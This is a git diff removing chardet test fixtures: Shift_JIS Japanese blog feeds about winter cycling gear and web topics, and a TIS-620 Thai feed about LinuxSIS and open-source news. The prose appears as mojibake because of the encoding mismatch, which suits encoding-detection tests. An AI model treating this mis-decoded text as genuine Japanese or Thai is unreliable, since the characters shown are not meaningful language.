    @‚»‚±‚ֵƒwƒA[ƒoƒ“ƒh®‚ּƒCƒ„[ƒEƒH[ƒ}[‚נw“B‚±‚ך‚ׂ©‚ָ‚טgoodI¡‚‚ֵ‚µ‚ִ‚¢‚½ƒ‚ƒRƒ‚ƒR‚ּƒCƒ„[ƒEƒH[ƒ}[‚ז‚ט‚א–h¦«‚ׂ‚­Aƒwƒ‹ƒƒbƒg‚ּ׳–‚‚ֹ‚א‚ָ‚ח‚ָ‚¢B‚µ‚©‚אˆֽ‚ּ‰¹‚אE‚¦‚י‚ז‚₪‚ֹ‚ָ‚ט‚‚µ‚½B‹²‚‚ƒ^ƒCƒv‚ֵ‚ֽ‚ָ‚¢‚ּ‚ֵ¨‚א’ֹ‚­‚ָ‚ח‚ָ‚¢B

    - -

    673.jpg

    - -

    @‚±‚ך‚ח‚ֽƒXƒL[AƒXƒmƒ{[—p•i‚ֵ‚·B’g‚©‚ֵ‚¨©‚‚ֵ‚·B(^^)

    - -

    @ˆָד3‰ס‚ֹ‚ם‚½‚י‹ֹ¦‘־פI—¹‚ֵ‚·BiƒƒNƒGƒXƒg‚א‚ָ‚¢‚¯‚ַj‚ ‚ֶ‚ֽƒAƒ“ƒ_[ƒEƒGƒA‚×—~‚µ‚¢‚¯‚ַA”ƒ‚₪ ’g‚©‚­‚ָ‚ֱ‚ִ‚½‚ט‚µ‚ִEEEB

    ]]> - -
    -
    - -‹ֹ¦‘־פi‚»‚ּ2j`ƒTƒ|[ƒeƒbƒNƒ^ƒCƒc - -2005-12-22T01:44:22Z -2005-12-21T09:25:54Z -tag:www.y-moto.com,2005:/bd-1//1.496 -2005-12-21T09:25:54Z - ƒ‚ƒ“ƒxƒ‹@ƒTƒ|[ƒeƒbƒNƒ^ƒCƒc @‚ ‚‚ט... - -y-moto -http://www.y-moto.com/ -birdy@y-moto.com - -ˆ— - -670.jpg

    - -

    ƒ‚ƒ“ƒxƒ‹@ƒTƒ|[ƒeƒbƒNƒ^ƒCƒc

    - -

    @‚ ‚‚ט‚ּ¦‚³‚ֵ‘«‚ּ‹״“ק‚ָׂ‚©‚ָ‚©‚‚®‚ך‚ָ‚¢B“~ך‚ֽ“ֱ‚ֹ—pS‚µ‚ִ‚‚·B‰½‰ס‚©‰‹‚ֹ“ֻ‘RƒqƒU‚ֹƒ’ֹ‚ב–‚ֱ‚½o±‚ׂ ‚י‚©‚ח‚ֵ‚·Bֵ‹‚ֵ‚א‘¾‚א‚א‚ֲׂ‚ט‹C–¡‚ֹ‚ָ‚ֱ‚ִ‚µ‚‚¢‚‚µ‚½B(+_+)

    - -

    @‚»‚ך‚ָ‚ּ‚ֵ“~ך‚ֽy‚¢ƒMƒA‚ֵƒQƒCƒfƒ“ƒX‚נד‚°‚יז‚ט•‚נS|‚¯‚ִ‚‚·BƒQƒCƒfƒ“ƒX‚נד‚°‚י‚ֹ‚ֽSPD‰»‚׈ך”װט‚ֱז‚ט‘‚¢B‚»‚ך‚×”ז˜J´‚נc‚³‚ָ‚¢ז‚ט•B

    - -

    @ƒqƒU‚ּƒTƒ|[ƒ^[‚נ’T‚µ‚ִ‚¢‚½‚ּ‚ֵ‚·‚×AƒAƒ“ƒ_[ƒ^ƒCƒc‚ֵƒTƒ|[ƒgר‰‚ד¾‚ח‚ך‚י‚א‚ּ‚נ”­©Bƒ‚ƒ“ƒxƒ‹‚ּuƒTƒ|[ƒeƒbƒNƒ^ƒCƒcv‚ֵ‚·B

    - -

    - -

    @“oRAƒgƒƒbƒLƒ“ƒO—p‚ֵ‚·‚×A©“]װ—p‚ֶ‚µ‚ִ‚א‹@”\‚µ‚»‚₪‚ֵ‚·Bˆך”װנ‚µ‚¢‚ּ‚ֽuƒj[ƒTƒ|[ƒgר‰v‚ֵ‚·BƒqƒU‚ט‚ֱׂׂ‚¿‚טֵ’ט‚³‚ך‚ִ‚¢‚י´‚¶‚ֹ‚ָ‚ט‚‚·B‘¾‚א‚א‚א“K“x‚ֹƒTƒ|[ƒg‚³‚ך‚ִ‚¢‚י‚ּ‚ֵA‹״“ק”ז˜J‚×­‚ָ‚¢B•‰·ר‰‚ֽ‚ ‚‚ט‚ָ‚¢‚ּ‚ֵd‚ֻ’…‚ֵ‘־‰B

    - -

    @ד‚ֹ‚ֽƒTƒCƒNƒ‹ƒj[ƒƒ“ƒOƒVƒ‡[ƒc‚נd‚ֻ‚י‚ֶA‚ֶ‚ִ‚א‚¢‚¢´‚¶B‚±‚ך‚ָ‚חƒj[ƒVƒ‡[ƒc‚ֽ’”Ng‚¦‚יB‰÷‚ֹƒƒbƒOƒEƒH[ƒ}[—‚±‚₪‚©“¢’†‚¾‚×A‘Oo‚ּƒtƒbƒgƒEƒH[ƒ}[‚נ‚·‚ך‚־‚©‚ָ‚ט’g‚©‚¢B

    - -

    @´‘z‚ֽ‚ָ‚©‚ָ‚©good‚ֵ‚·Bƒyƒ_ƒƒ“ƒO‚אy‚ֹ‚ָ‚ט‚‚µ‚½B¡‚‚ֵ‚׃†ƒjƒNƒ‚ּƒ`ƒmƒpƒ“‚¾‚ֱ‚½‚ּ‚ֵ”ה‚׳•¨‚ֹ‚ָ‚ט‚‚¹‚סB‚±‚ך‚ָ‚חµ¦ת‚ֹ‚א‘«‚נ’ֹ‚‚ָ‚¢‚ֶv‚₪B

    - -

    671.jpg
    -iƒn[ƒtƒpƒ“ƒc{ƒTƒ|[ƒeƒbƒNƒ^ƒCƒc{ƒtƒbƒgƒEƒH[ƒ}j©‚½–—ַ‚­‚ָ‚¢‚¯‚ַy‚ֹ‚ָ‚ט‚‚µ‚½BALLƒ‚ƒ“ƒxƒ‹‚ֵ‘«‚ט‚נֵ‚‚יB‚ֲ‚¢‚ֵ‚ֹƒWƒƒƒPƒbƒgAƒOƒ[ƒu‚אEEEBi”j

    - -

    @4ƒV[ƒYƒ“–‚ֵ‚ג‚ֱ‚ֶ©•ּׂ‘«‰ס‚ט‚‚ֵ“’BB‚ֶ‚ֹ‚©‚­“~ך‚ּ’‹־‚ֽ‚¨‹א‚×|‚©‚ט‚‚·‚ז`B(+_+)

    ]]> - -
    -
    - -‹ֹ¦‘־פi‚»‚ּ1j`ƒtƒbƒgƒEƒH[ƒ}[ƒƒ“ƒO - -2005-12-20T10:10:11Z -2005-12-20T09:40:57Z -tag:www.y-moto.com,2005:/bd-1//1.495 -2005-12-20T09:40:57Z -@³‹x‚‚ֹl‚¦‚ִ‚¢‚½u‹ֹ¦‘־פv‚¾‚ֱ‚½... - -y-moto -http://www.y-moto.com/ -birdy@y-moto.com - -ˆ— - -@³‹x‚‚ֹl‚¦‚ִ‚¢‚½u‹ֹ¦‘־פv‚¾‚ֱ‚½‚ּ‚ֵ‚·‚×A‚±‚±‚ּ‚ֶ‚±‚כ‚ּ‹}ƒ‚ָ—ג‚¦‚‚ֽu‘z’טOv‚ֵ‚µ‚ִ©•שg‚א­‚µ‰¹‚נד‚°‚ִ‚µ‚‚ֱ‚½‚ֵA‹ֹ¦‘־פ‚נ{‚·‚±‚ֶ‚ֹB‚¿‚ו‚₪‚ַ‰ֶ‚נo‚י ‚ֽ“ת‚ּo‚ּ ‚ֵˆך“ת‚ֵˆך”װ—ג‚¦‚װ‘ׁ‚ֹ‰ֶ‚נo‚ָ‚¯‚ך‚־‚ָ‚ח‚ָ‚¢B‹A‘מ‚ּװ‘ׁ‚א“–‘R“ת–vד‚ֵ—ג‚¦‚B

    - -

    @“~‚ֵ‚א©“]װ‚ֹז‚י‚ֶ‘ּ‚ׂ¾‚ס‚¾‚ס’g‚‚ֱ‚ִ‚«‚‚·‚×AטA‘«i‚ֲ‚זjA¨AחAטע‚ָ‚ַ‚ֽ’g‚‚ט‚‚¹‚סB’Zװ‚ָ‚ח‚‚¾‹C‚ֹ‚ָ‚ט‚‚¹‚ס‚×’·װ‚ֹ‚ָ‚י‚ֶ‚©‚ָ‚ט‚ֲ‚ח‚¢B

    - -

    @“ֱ‚ֹ‘«‚ֽd—vBu“צ‘«”Mv‘«ז‚נ’g‚‚ך‚־‘ּ‘S‘ּ‚×’g‚©‚¢‚ֶ´‚¶‚יB‘O‚ֹƒ‚ƒ“ƒxƒ‹‚ּƒgƒD[ƒEƒH[ƒ}[‚נ”ƒ‚¨‚₪‚©‚ַ‚₪‚©–ְ‚ֱ‚ִ‹‹ַ”ƒ‚ם‚ָ‚©‚ֱ‚½‚ּ‚ֵ‚·‚×Aֵ‹‚ּ¦‚³‚©‚חu”ƒ‚ֱ‚ִ‚¨‚¯‚־‚ז‚©‚ֱ‚½v‚ֶד‰ק‚ּ”OB

    - -

    669.jpg

    - -

    @ƒ‚ƒ“ƒxƒ‹@ƒTƒCƒNƒ‹ƒtƒbƒgƒEƒH[ƒ}[ƒƒ“ƒO

    - -

    @‚»‚±‚ֵuƒtƒbƒgƒEƒH[ƒ}[ƒƒ“ƒOv‚נw“‚µ‚‚µ‚½BƒTƒCƒNƒ‹ƒtƒbƒgƒEƒH[ƒ}[ƒVƒ‡[ƒg‚נ’T‚µ‚ִ‚‚µ‚½‚×”„‚ט״‚ךB‚±‚ּƒ^ƒCƒv‚ֽC‘S‘ּ‚נ•¢‚₪ƒ^ƒCƒv‚ּ‚א‚ּ‚ֵA‚ֲ‚ז‚©‚ח‘«ס‚‚ֵ‚נ•¢‚₪ƒ^ƒCƒvBד‚©‚ח‚ֲ‚ז‚ֹˆר‚ֱ|‚¯‚יƒ^ƒCƒv‚ָ‚ּ‚ֵASPD‚ֹ‘־‰‚µA•א‚«‚ֹ‚­‚³‚א‚ָ‚µB

    - -

    @‚¿‚ו‚₪‚ַ’·C‚‚½‚¢‚ָ´‚¶‚ֹ‚ָ‚י‚ּ‚ֵA•G‰÷‚ּƒn[ƒtƒpƒ“ƒc‚ּ‡‚ם‚¹‚י‚ֶA‚¿‚ו‚₪‚ַ‘«ס‚׉B‚ך‚ִ¦‚­‚ָ‚¢B

    - -

    @ד“_‚ֶ‚µ‚ִ‚ֽuC‚×’E‚¬‚ֹ‚­‚¢vBC‘S‘ּ‚נ•¢‚ֱ‚ִ‚¢‚י‚ּ‚ֵƒXƒgƒ‰ƒbƒv‚×O‚¹‚ָ‚¢‚ּ‚ֵC‚נ’E‚®‚ֽ‚±‚ּƒJƒo[‚נO‚³‚ָ‚­‚ִ‚ֽ‚ָ‚ח‚ָ‚¢B

    - -

    @•—‚ד‚ח‚ָ‚¢‚ּ‚ֵAƒyƒ_ƒ‹‘†‚®‘«ז‚ט‚אy‚­‚ָ‚ט‚‚·B

    ]]> - -
    -
    - -NIKE KATO‡V - -2005-12-19T09:12:47Z -2005-12-19T08:45:46Z -tag:www.y-moto.com,2005:/bd-1//1.494 -2005-12-19T08:45:46Z - @‚¸[‚ֱ‚ֶ‘O‚©‚ח—~‚µ‚©‚ֱ‚½NIKE K... - -y-moto -http://www.y-moto.com/ -birdy@y-moto.com - -ˆ— - -668.jpg

    - -

    @‚¸[‚ֱ‚ֶ‘O‚©‚ח—~‚µ‚©‚ֱ‚½NIKE KATO‡V‚נw“‚µ‚‚µ‚½B¡‚‚ֵ—‚¢‚ִ‚½Shimano‚ּƒVƒ…[ƒY‚אƒ{ƒƒ{ƒ‚ֹ‚ָ‚טAƒfƒUƒCƒ“‚אƒ_ƒTƒ_ƒT‚ָ‚ּ‚ֵAV‚µ‚¢C‚נ’T‚µ‚ִ‚‚µ‚½B

    - -

    @‚½‚‚½‚s‚ֱ‚½‚¨“X‚ֹNIKE KATO‚ּ©•ֹׂ‡‚₪ƒTƒCƒY‚ׇ‚ֱ‚½‚ּ‚ֵw“‚µ‚‚µ‚½Bi‚»‚ך‚נױ“®”ƒ‚¢‚ֶ‚א¾‚₪j

    - -

    @‚±‚ך‚ֽˆך©SPDƒVƒ…[ƒY‚ֹ‚ֽ©‚¦‚ָ‚¢BƒNƒ[ƒgi‹א‹ןj‚׉‚ֹˆר‚ֱ‚ס‚ֵ‚¢‚ִAC’ך‚א‚»‚ס‚ָ‚ֵֹ‚­‚ָ‚¢‚ּ‚ֵ•א‚«‚ג‚·‚¢B•א‚¢‚ִ‚א‹א‹ן‚נuƒJƒ`ƒJƒ`v–ֲ‚ח‚·‚±‚ֶ‚א‚ָ‚¢BK’i‚גƒGƒXƒJƒ[ƒ^[‚ֵ‚א‚±‚¯‚»‚₪‚ֹ‚ָ‚יS”z‚ָ‚¢B

    - -

    @y‚¢‚ּ‚ֵ‚ז‚­‰ס‚¹‚יBƒXƒgƒ‰ƒbƒvd—l‚ָ‚ּ‚ֵƒ`ƒF[ƒ“‚ֹC•R‚נ‚ֽ‚³‚‚S”z‚ָׂ‚¢B‚±‚ך‚ֽv‚ֱ‚ִ‚½‚ז‚ט‚א‰ץ“KB
    -@
    -@—ײs‚ג‚ַ‚±‚©‚ֹס‚ט“¹‚µ‚½‚ָ‚ַ‚ֹ‚ֽƒCƒC‚ֶv‚¢‚‚·BSPDƒVƒ…[ƒY‚ֹ’ןR‚ ‚יl‚ֹ‚ֽ‚¨‚·‚·‚B

    ]]> - -
    -
    - -¡T‚ֽ98km`ƒuƒƒO‚ּƒpƒ[ - -2005-12-18T14:22:37Z -2005-12-18T14:20:02Z -tag:www.y-moto.com,2005:/bd-1//1.493 -2005-12-18T14:20:02Z - ¡T‚ּֿZ‹——£ 98km@ˆ“®•½‹ֿ‘¬@... - -y-moto -http://www.y-moto.com/ -birdy@y-moto.com - -‘–s‹——£•ס - -667.jpg

    - -

    ¡T‚ּֿZ‹——£ 98km@ˆ“®•½‹ֿ‘¬@19.4km/h@ֵ‚‘¬“x 35.9km/h

    - -

    @ֵ‹¦‚¢‚ֵ‚·‚ֻB‚»‚ּ‚¹‚¢‚©‚ם‚©‚ט‚‚¹‚ס‚ב¾‘‚×¹‚ט‹C–¡‚¾‚ֱ‚½‚ּ‚ֵ‹——£‚×L‚ׁ‚‚¹‚ס‚ֵ‚µ‚½B‹­—ף‚ָ¦”g‚ֽ‚µ‚־‚ח‚­‚»‚ּ‚‚‚ּ‚ז‚₪‚ֵ‚·B

    - -

    @ƒuƒƒOJ‚©‚ח1”N2ƒ–‚×o‰‚µA©ָ[”­‚ֶ‚µ‚ִu“~ך‚ּ©“]װ’‹־v‚נp‘±‚³‚¹‚י‚±‚ֶ‚×–{—ˆ‚ּ‚±‚ּƒuƒƒO‚ּƒ‚ƒbƒg[‚ֵ‚µ‚½BƒuƒƒO‚ג‚יˆָ‘O‚ֽ“~ך‚ֽv‚₪‚ז‚₪‚ֹז‚ך‚ָ‚©‚ֱ‚½BƒuƒƒO‚ג‚ֱ‚ִ‚ָ‚©‚ֱ‚½‚ח‚±‚ּ‚­‚ח‚¢‚ּ¦‚³‚¾‚ֶ‚ֶ‚₪‚ֱֹ‚µ‚ִ‚‚·‚ֻB

    - -

    @‚ג‚ֽ‚ט‰S–Y‚ך‚י‚׳‚©‚ח‚¸‚ֵ‚א‚₪ˆך“x´“_‚נU‚ט•װ‚יˆ׃–¡‚ֵ‚µ‚ֱ‚©‚ט‚ֶ‘־פ‚נ‚µ‚ִ©“]װ’‹־‚נp‘±‚³‚¹‚ָ‚­‚ִ‚ֽ‚ָ‚ט‚‚¹‚סB

    - -

    @ƒuƒƒO‚ּ—ֽ‚׈ּ‘ו‚ֶv‚₪‚ּ‚ֽAƒuƒƒO‘‚­‚½‚‚ֹu©“]װ‚ֹז‚ח‚ָ‚«‚בv‚ֱ‚ִv‚₪‚±‚ֶB‚»‚₪l‚¦‚י‚ֶƒuƒƒO‚ּƒpƒ[‚ֽ‹°‚י‚׳‚µB

    - -

    @נƒV[ƒYƒ“‚ֽ’‚¶‚ִAז‚י‚±‚ֶ‚×o—ˆ‚½B‚»‚µ‚ִ¡”N‚אp‘±’†‚ֵ‚·‚×A‚ג‚ֽ‚ט“~ך‚ֵ‚אז‚ט‘±‚¯‚ז‚₪‚ֶˆS‚µ‚½‚ּ‚ֽ‚‚³‚µ‚­ƒuƒƒO‚ּ‚¨‚©‚°B

    - -

    @‘–‚ח‚ָ‚¢‚ֶ‘‚¯‚ָ‚¢‚±‚ֶ‚ֱ‚ִ‚¢‚ֱ‚ֿ‚¢‚ ‚י‚ז‚₪‚ָ‹C‚ׂ·‚יB‚ֶ‚¢‚¢‚ֲ‚ֲ‚א‚¢‚ֲ‚א‚½‚¢‚µ‚½‚±‚ֶ‘‚¢‚ִ‚ָ‚¢‚¯‚ַEEEB

    ]]> - -
    -
    - -
    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/yasuhisa.com.xml b/chardet/tests/SHIFT_JIS/yasuhisa.com.xml deleted file mode 100644 index ce5e742..0000000 --- a/chardet/tests/SHIFT_JIS/yasuhisa.com.xml +++ /dev/null @@ -1,89 +0,0 @@ - - - - - C O U L D - http://www.yasuhisa.com/could/ - the world according to yasuhisa - C O U L D - - ja - - - - - - - - - - - - - - - - - ƒ|[ƒ^ƒ‹ 2.0 - http://www.yasuhisa.com/could/entries/000871.php - ¡‚‚ֵƒT[ƒrƒX’ס‹‘₪‚ּwFx‚בO–‚ֹo‚ִ‚¢‚½]—ˆ‚ּƒ|[ƒ^ƒ‹‚ֶ‚ֽ‚ַ‚ס‚ַ‚ס‰“‚´‚©‚ֱ‚ִ—ˆ‚ִ‚¢‚י‚ֶ‚א‚¢‚¦‚י‚ּ‚©‚א‚µ‚ך‚‚¹‚ס‚ֻB - 2006-01-03 21:32:56 - - - RSS‚נƒVƒ“ƒvƒ‹‚ֹ - http://www.yasuhisa.com/could/entries/000870.php - ‚¢‚©‚ֹRSS‚ּ‚ ‚יƒlƒbƒg¶ˆ‚×ר—¦—ַ‚­‚ִ•ײ—˜‚ָ‚א‚ּ‚©‚נƒAƒs[ƒ‹‚·‚י‚½‚‚ֹ‚אƒVƒ“ƒvƒ‹‚ֵƒNƒƒA‚ָא–¾‚ֶˆ—p‚ּ‚½‚‚ּ‘‹‚וK—v‚ָ‚ּ‚©‚א‚µ‚ך‚‚¹‚סB - 2006-01-02 21:30:44 - - - Year in Review 2005 - http://www.yasuhisa.com/could/entries/000869.php - ¡”N‚אƒvƒ‰ƒCƒx[ƒg‚ֶd–‚ֵ‚¢‚כ‚¢‚כ‚ ‚ֱ‚½”N‚¾‚ֱ‚½‚ם‚¯‚ֵ‚·‚×A¡”N‚נ’ק‚‚­‚­‚י‚ֶ‚¢‚₪‚±‚ֶ‚ֵ2005”N‚ֹ‘‚¢‚½ƒxƒXƒgƒGƒ“ƒgƒ[‚נ׀‰מ‚µ‚ִ‚¨‚±‚₪‚ֶv‚¢‚‚·B - 2005-12-31 12:56:34 - - - s–¯ƒWƒƒ[ƒiƒƒYƒ€Remix - http://www.yasuhisa.com/could/entries/000868.php - ƒƒCƒ“ƒXƒgƒ[ƒ€ƒƒfƒBƒA‚ּ‰e‹¿—ֽ‚ֽ‚ָ‚­‚ָ‚ֱ‚ִ‚µ‚‚₪‚ּ‚©‚ֶ‚¢‚ֱ‚½‚ח‘S‚­‚»‚₪‚ֵ‚ֽ‚ָ‚¢‚ֶv‚¢‚‚·B‚‚µ‚כs–¯ƒWƒƒ[ƒiƒƒXƒg‚ֶƒRƒ‰ƒ{‚µ‚½‚טA‘½‚­‚ּƒrƒ…[ƒ[‚ֹ‚¯‚ִ”­M‚·‚י‚½‚‚ּd—v‚ָƒpƒCƒvƒ‰ƒCƒ“‚ֹ‚ָ‚י‚ֶv‚¢‚‚·B - 2005-12-30 15:04:57 - - - ƒ|ƒbƒv‚ְָ±‰¹y - http://www.yasuhisa.com/could/entries/000867.php - ¡”N‚ּƒxƒXƒgƒAƒ‹ƒoƒ€‚נƒƒXƒgƒAƒbƒv‚נ‚·‚י‚ּ‚א—ַ‚¢‚©‚א‚µ‚ך‚‚¹‚ס‚×A‚ָ‚©‚ָ‚©”‚×i‚ך‚ָ‚¢‚ּ‚ֵ¡”N‚ֵֽ‚אˆף‚ֹc‚ֱ‚½ƒA[ƒeƒBƒXƒg‚נ‚׀‚ֶ‚ט׀‰מ‚µ‚ִ‚¨‚±‚₪‚©‚ֶv‚¢‚‚·B - 2005-12-29 21:58:06 - - - “ַׂו“±ƒRƒ“ƒeƒ“ƒc‚ּץ - http://www.yasuhisa.com/could/entries/000866.php - ƒuƒƒOƒGƒ“ƒgƒ[‚ֹƒtƒH[ƒJƒX‚³‚ך‚½ץ‚א•K—v‚ֵ‚·‚×AƒRƒƒ“ƒg‚גƒ^ƒO‚נץ‚µ‚ִAˆך‘ּ“ַׂ‚ֽ‰½‚נl‚¦‚ִ‚¢‚י‚ּ‚©/‹‚‚ִ‚¢‚י‚ּ‚©‚נץo—ˆ‚½‚ח•ײ—˜‚©‚א‚µ‚ך‚‚¹‚סB - 2005-12-28 09:24:11 - - - Apple+Podcast - http://www.yasuhisa.com/could/entries/000865.php - OSX Server‚ֹBlojsom‚ד‹‚³‚ך‚ִ‚¢‚י‚ּ‚ֽV‚µ‚¢ƒjƒ…[ƒX‚ֵ‚א‚ָ‚¢‚ּ‚ֵ’m‚ֱ‚ִ‚¢‚י•‚א‚¢‚י‚©‚א‚µ‚ך‚‚¹‚ס‚×APodcast”zM‹@”\‚א‚ ‚י‚‚½‚¢‚ֵ‚·‚ֻB - 2005-12-25 23:06:37 - - - ƒlƒbƒg10‰­l‘ד - http://www.yasuhisa.com/could/entries/000864.php - ¡”N‚אƒlƒbƒg‚ֵ‚ֽ—lX‚ָo—ˆ–‚ׂ ‚ֱ‚½‚ֶv‚¢‚‚·‚×Aƒlƒbƒgƒ†[ƒU[‚ֲׂ‚¢‚ֹ10‰­l‚נ“ֻ”j‚µ‚½‚ּ‚א’–‚·‚׳‚«o—ˆ–‚ּ‚׀‚ֶ‚ֲ‚©‚א‚µ‚ך‚‚¹‚סB - 2005-12-23 14:48:00 - - - Podcast No.45 - http://www.yasuhisa.com/could/entries/000863.php - ¡‰ס‚ֽStudio Freesia‚ּ‘ד•\‚ֵAƒfƒWƒ^ƒ‹ƒXƒP[ƒv‚ֵut‚א‚µ‚ִ‚¢‚ח‚ֱ‚µ‚ב‚יˆֹ“¡ w‚³‚ס‚ֶ‚ּ‘־’k‚ֵ‚·B - 2005-12-22 16:44:57 - - - ‚א‚ֱ‚ֶƒ^ƒO¶ˆ - http://www.yasuhisa.com/could/entries/000862.php - ƒJƒeƒSƒ‚גƒfƒBƒƒNƒgƒ‚ּ‚ז‚₪‚ֹ‚׀‚ֶ‚ֲ‚ּƒnƒbƒLƒ‚ֶ‚µ‚½˜g“א‚ֹ“‚ך‚ך‚ָ‚¢מ•ס‚ב‚¦‚ִ—ˆ‚ִ‚¢‚י¡“ת‚±‚ּ‚²‚כB‚»‚ך‚ח‚נדט‚­®—‚µ‚ִ—~‚µ‚¢מ•ס‚נˆר‚«o‚·‚ֶ‚«‚ֹƒ^ƒO‚ֽ‘ו•ֿ•ײ—˜‚¾‚ֶv‚¢‚‚·B - 2005-12-21 10:37:07 - - \ No newline at end of file diff --git a/chardet/tests/TIS-620/opentle.org.xml b/chardet/tests/TIS-620/opentle.org.xml deleted file mode 100644 index 08eb085..0000000 --- a/chardet/tests/TIS-620/opentle.org.xml +++ /dev/null @@ -1,176 +0,0 @@ - - - - - - - -OpenTLE -http://www.opentle.org/ -:: OpenTLE.org :: -th - - OpenTLE - http://www.opentle.org/images/logo.gif - http://www.opentle.org/ - -admin@opentle.org - -«ֽ¿בֳַלגֽא¾¹«ֳֽל¨׀´ד ¶יׂ¼יד×י§ׂ¹ֱׁט¹ד¨-ְׂ₪ֳׁ°¹ׁ÷¹״¹ -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=289 -»ֳ׀ֱׂ³ 5 »ױ·ױט¼טׂ¹ֱׂ ֲֵֻֻׂ¹טֲַ§ׂ¹·ׁי§ְׂ₪ֳׁ°בֵ׀אֽ¡×¹ ה´י¾ֱֲֲׂׂ¹׃א¹ֽאֳ׳טֽ§ֳַׂµטׂ§ז בֵ׀¨ׁ´¡ֱֱֳׁׂ¹ׂא¡ױטֲַ¡ׁ÷«ֽ¿µלבֳַלגֽא¾¹«ֳֽל א¾׳טֽדֻי₪ֱֳַׂיבֵ׀ב¹׀¹׃ג»ֳב¡ֱֳ·ױט¹טׂד×י¨ׂ¡½ױֱ׳ֽ¢ֽ§¹ׁ¡¾ׁ²¹ׂ₪¹ה·ֲ ¨¹»ׁ¨¨״÷ׁ¹אֳװטֱֱױ¡ֳׂד×י§ׂ¹¡ׁ¹ֱׂ¡¢ײי¹ ·ׁי§ד¹¡ֵ״טֱֽ§₪ל¡ֳ¸״ֳ¡װ¨¢¹ׂ´אֵח¡ ¢¹ׂ´¡ֵׂ§ ¢¹ׂ´דֻ­טבֵ׀ד¹ֱַֻׂװ·ֲֲֵׁׂ בµט¡ֵׁ÷הֱטה´י×טֲַ·׃ דֻי¡ֵ״טֱ¼יד×י§ׂ¹µֱׂ÷יׂ¹·ׁטַה» (End User) בֵ׀ֻ¹טֲֳַׂסֱֲֳֳֽׁׂ÷ - - -Mambo template contest -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=288 -׃¹ׁ¡§ׂ¹ט§אֳװֱֽ״µֻׂ¡ֱֳֳ«ֽ¿µלבֳַלבֻט§×ׂµװ ֳֻ׳ֽ SIPA ֳטֱַ¡ׁ÷ MamboHub.com ¢ֽאֳױֲ¹א×װ­·״¡·טׂ¹·ױט¹ד¨ט§ Template א¢יֳׂטֱַ¡ֳׂ»ֳ׀¡ַ´ &#8220;Mambo Template Contest&#8221; ´יֲַ Mambo 4.5.X ׃ֳֻׁ÷ד×י¨ֳװ§ד¹אַח÷ה«µל thaiopensource.org אַח÷ה«µלָ¹ֲלֱֳַ¢יֱֵֽ¢טֳַׂׂ¢ֽ§«ֽ¿µלבֳַל Open Source ד¹אֱ׳ֽ§ה·ֲ ג´ֱֲֳׂׂ¶ט§¼ֵ§ׂ¹א¢יׂ»ֳ׀¡ַ´ה´י ·ׁי§ד¹¹ֱׂ¢ֽ§÷ֳװֹׁ· ÷״₪₪ֵ ֳֻ׳ֽ ¡ֵ״טֱ/₪³׀ ·ׁי§¹ױיא¾׳טֽא»װ´גֽ¡ׂ בֵ׀¹ׁ÷¹״¹דֻי¡ֵ״טֱ¼יד×י Mambo ד¹אֱ׳ֽ§ה·ֲה´יֱױטַ¹ֳטֱַד¹¡ֳֽֽׂ¡ב÷÷בֵ׀¾ׁ²¹ׂאַח÷ה«µל thaiopensource.org µטֽה»ד¹ֽ¹ׂ₪µ - - -LinuxSIS 5.0 Beta Installation and Bug Fix -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=287 -ֵֻׁ§¨ׂ¡·ױטה´י»ֵטֲֽµַׁ LinuxSIS 5.0 beta (ֳ״ט¹·´ֽ÷) ֽֽ¡ה»אֱ׳טֽ¡ֵׂ§א´׳ֽ¹¾ִָ¨װ¡ֲׂ¹ א¾׳טֽדֻי¼י·ױט¹ד¨¹׃ה»·´ֽ÷בֵ׀ֲֳׂ§ׂ¹÷ׁך¡ֱׂה´יֳ׀ֲ׀ֻ¹ײט§בֵיַ ¢³׀¹ױי·ׂ§¼י¾ׁ²¹ׂה´י¡חה´יאµֳױֱֲאֽ¡ֳׂ׃ֳֻׁ÷¡ֳׂµװ´µׁי§בֵ׀ב¡י÷ׁך¡¢ײי¹ ג´ֲ·טׂ¹ֱֳׂׂ¶א¢יׂה»´ֲֳֵׂ׀אֽױֲ´ה´י·ױטֻ¹יׂ "¢יֽב¹׀¹׃׃ֳֻׁ÷ֳ״ט¹·´ֽ÷" - - -LinuxSIS 5.0 Beta א»װ´דֻי Download בֵיַ -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=285 -LinuxSIS ×״´«ֽ¿µלבֳַל׃אֳח¨ֳ» ·ױט¶¡¾ׁ²¹ׂ¢ײי¹ג´ֱֲױ¨״´ֱ״ט§ֱֲֻׂ א¾׳טֽ¾ׁ²¹ֳׂ׀÷÷»¯װ÷ׁµװ¡ֳׂ¢ֽ§₪¹ה·ֲ·ױט·׃ֻ¹יׂ·ױטא»ח¹ ֽװ¹א·ֳֽלא¹חµ ֳֻ׳ֽֽװ¹·ֳׂא¹חµא«װֳל¿אֳַֽל (Internet/Intranet Server) דֻי¡ׁ÷גֳ§אֳױֲ¹ ֻ¹טֲַ§ׂ¹בֵ׀ֽ§₪ל¡ֳµטׂ§ז ג´ֱֲֳׂׂ¶¹׃ה»µװ´µׁי§¡ׁ÷א₪ֳ׳טֽ§₪ֱֽ¾װַאµֳֽל¸ֱֳֳ´ׂ·ׁטַז ה» (PC : Personal Computer) ֳֻ׳ֽא₪ֳ׳טֽ§בֱט¢טֲׂ¸ֱֳֳ´ׂ (Server PC Base) דֻי¡ֲֵׂא»ח¹א₪ֳ׳טֽ§א«װֳל¿אֳַֽל (Server - א₪ֳ׳טֽ§בֱט¢טֲׂ) ·ױטֱױ»ֳ׀װ·¸װְׂ¾§ - - -»ֳ׀¡ֲֳָׂׂ×׳טֽ ¼יה´יֳׁ÷·״¹ֽ÷ֱֳֿ -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=284 -¨ׂ¡¢טַׂ "·״¹ֽ÷ֱֳ Open Source Training The Trainer" ÷ׁ´¹ױי א¹₪א·₪ה´י₪ׁ´אֵ׳ֽ¡¼י·ױטֱױ₪ֱַׂאֱֻׂ׀ֱ ד¹¡ֳׂא´װ¹·ׂ§ה»ֽ÷ֱֳ ³ »ֳ׀א·ֳָָױֵׁ§¡ׂ ´ׁ§µטֽה»¹ױי - 1. Mr. Isriya Paireepairit - 2. Mr. Somphol Boonjing - -·ׁי§¹ױיא¹₪א·₪¨׀א¡ח÷ד÷ֱׁ₪ֳ·טׂ¹ֽ׳ט¹ז 